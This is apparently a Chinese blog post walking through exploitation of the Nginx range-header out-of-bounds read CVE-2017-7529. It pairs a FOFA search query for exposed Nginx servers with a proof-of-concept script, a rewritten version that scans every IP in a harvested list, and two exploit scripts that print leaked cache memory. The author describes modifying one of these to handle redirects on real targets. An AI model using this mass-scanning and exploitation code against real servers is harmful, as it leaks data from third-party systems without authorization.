参考:
- Nginx越界读取缓存漏洞 CVE-2017-7529 | PeiQi文库 (wgpsec.org)
- Nginx越界读取缓存漏洞(CVE-2017-7529)复现分析 - qweg_focus - 博客园 (cnblogs.com)
一、fofa 搜索
nginx && port="80"
我这里写了个脚本将ip保存下来,搜索ip脚本的编写教程:Python教程:如何用Python编写FOFA爬虫获取信息?_fofa python-CSDN博客
二、漏洞复现
漏洞poc
#!/usr/bin/env python
import sys
import requests
if len(sys.argv) < 2:
print("%s url" % (sys.argv[0]))
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
sys.exit()
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
我根据poc重写了脚本,读取本地的ip.txt文件进行验证漏洞
#!/usr/bin/env python
import requests
def check_vulnerability(url):
"""
检查给定的URL是否存在漏洞,根据响应内容进行判断。
参数:
url (str): 需要检查漏洞的URL。
返回:
bool: 如果存在漏洞返回True,否则返回False。
"""
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605 # 调整字节范围的偏移量
try:
# 发起初始请求以获取响应内容长度
response = requests.get(url, headers=headers, timeout=10)
file_len = len(response.content)
n = file_len + offset
# 设置Range头部以请求特定的字节范围
headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers, timeout=10)
# 检查响应是否指示存在漏洞(例如,状态码206且内容非空)
if r.status_code == 206 and r.content:
return True
except requests.RequestException as e:
# 静默处理请求异常
pass
# print(f"请求错误: {e}")
return False
def main():
"""
主函数,从文件中读取URL并检查每个URL是否存在漏洞。
"""
# 打开包含URL的文件
with open('ip.txt', 'r') as file:
urls = [line.strip() for line in file]
# 检查每个URL是否存在漏洞
for url in urls:
# print(f"正在验证的URL: {url}")
if check_vulnerability(url):
print(f"验证成功的URL: {url}")
if __name__ == "__main__":
main() 
三、利用漏洞
poc
import requests
import urllib3
def cve20177529():
try:
# 构造请求头
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
}
url = 'http://127.0.0.1:8080/'
# 获取正常响应的返回长度
# verify=False防止ssl证书校验,allow_redirects=False,防止跳转导致误报的出现
r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
url_len = len(r1.content)
# 将数据长度加长,大于返回的正常长度
addnum = 320
final_len = url_len + addnum
# 构造Range请求头,并加进headers中
# headers['Range'] = "bytes=-%d参考资料,-%d" % (final_len, 0x8000000000000000-final_len)
0x8000000000000000
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",
'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
}
# 用构造的新的headers发送请求包,并输出结果
r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
text = r2.text
code = r2.status_code
print(code)#打印状态码
print(text)#打印响应
except Exception as result:
print(result)
if __name__ == "__main__":
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
cve20177529()
我用这个poc遇到目标进行302重定向没有获取到目标信息,然后我又改了一下
import requests
import urllib3
def cve20177529():
"""
检查特定URL是否存在CVE-2017-7529漏洞。
"""
try:
# 构造请求头,模拟浏览器访问
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
}
url = 'http://xxxx' # 目标URL
# 发起初始请求以获取响应内容长度
r1 = requests.get(url, headers=headers, verify=False, allow_redirects=True)
url_len = len(r1.content)
# 设置范围增量
addnum = 320
final_len = url_len + addnum
# 构造带有Range头部的请求
headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
# 发送带有Range头部的请求
r2 = requests.get(url, headers=headers, verify=False, allow_redirects=True)
text = r2.text
code = r2.status_code
# 输出响应状态码和内容
print(f"Status Code: {code}")
print("Response Body:")
print(text)
except Exception as e:
# 捕捉并输出异常信息
print(f"An error occurred: {e}")
if __name__ == "__main__":
# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 调用检查函数
cve20177529()
状态码 206 表示“部分内容”(Partial Content),通常是在服务器处理了部分范围请求时返回的。
